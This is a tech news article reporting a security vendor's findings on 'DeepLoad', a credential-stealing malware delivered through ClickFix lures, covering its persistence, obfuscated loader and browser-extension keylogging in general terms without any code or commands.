Skip to content
Tech News
← Back to articles

AI-Powered 'DeepLoad' Malware Steals Credentials, Evades Detection

2026-03-30 | original
read original get Cybersecurity USB Data Block → more articles
Why This Matters

The discovery of DeepLoad highlights the growing sophistication of malware leveraging AI and process injection techniques to evade detection and steal credentials in real time. Its ability to persist and operate stealthily poses significant risks to enterprise security and consumer data privacy, emphasizing the urgent need for advanced cybersecurity measures.

Key Takeaways

Researchers have uncovered a new malware strain capable of stealing credentials immediately after gaining a foothold on a victim network, capturing both stored browser passwords and live keystrokes in real time through a standalone stealer and a malicious browser extension.

What makes the malware particularly difficult to contain, according to ReliaQuest, is its likely use of AI-generated code and process injection to evade detection tools. It also incorporates a persistence mechanism that can silently re-execute even after an infected host appears fully clean.

DeepLoad Delivery via ClickFix

The authors of the malware, which ReliaQuest is tracking as "DeepLoad" are using the ClickFix social engineering technique to distribute the credential stealer in enterprise environments.

"DeepLoad steals credentials from the moment it lands, so even partial containment can still leave you with exposed passwords, session, and active accounts," ReliaQuest warned in a report this week. "Before the main attack chain finishes, a standalone credential stealer, filemanager.exe, is already running on its own infrastructure and can exfiltrate data even if the main loader is detected and blocked."

Related:Phishers Pose as Palo Alto Networks' Recruiters for Months in Job Scam

In addition, the browser extension that the malware drops and registers can capture credentials in real-time as users type them, and it persists across browser sessions until explicitly removed, the security vendor said.

As with most ClickFix scams, the attack chain begins with users receiving fake browser prompts asking them to execute a seemingly benign command to "fix" some kind of made up "error." In this instance, the command immediately creates a scheduled task to re-execute the loader, so it persists across reboots or partial detection, without the user having to do anything thereafter. The malware then uses mshta.exe, a legitimate Windows utility, to communicate with the attacker's infrastructure and download a heavily obfuscated PowerShell loader.

Heavily Padded Loader

ReliaQuest's analysis of DeepLoad showed its functional code is buried under thousands of lines of junk code that appeared designed to overwhelm static scanning tools and leave them with nothing to flag. The sheer volume of padding in the loader suggests that it was not written by a human author, but most likely developed by an AI model, the security vendor said.

... continue reading

Explore topics: deepload reliaquest clickfix palo alto networks browser extension
Related:
Palo Alto shares pop as CEO Nikesh Arora buys stock for first time in years
Apple adds macOS Terminal warning to block ClickFix attacks
MacOS 26.4 Adds Warnings For ClickFix Attacks to Its Terminal App
New Infinity Stealer malware grabs macOS data via ClickFix lures
Cybersecurity stocks fall on report Anthropic is testing a powerful new model

© 2026 GoKawiil

About | Editorial Policy | Contact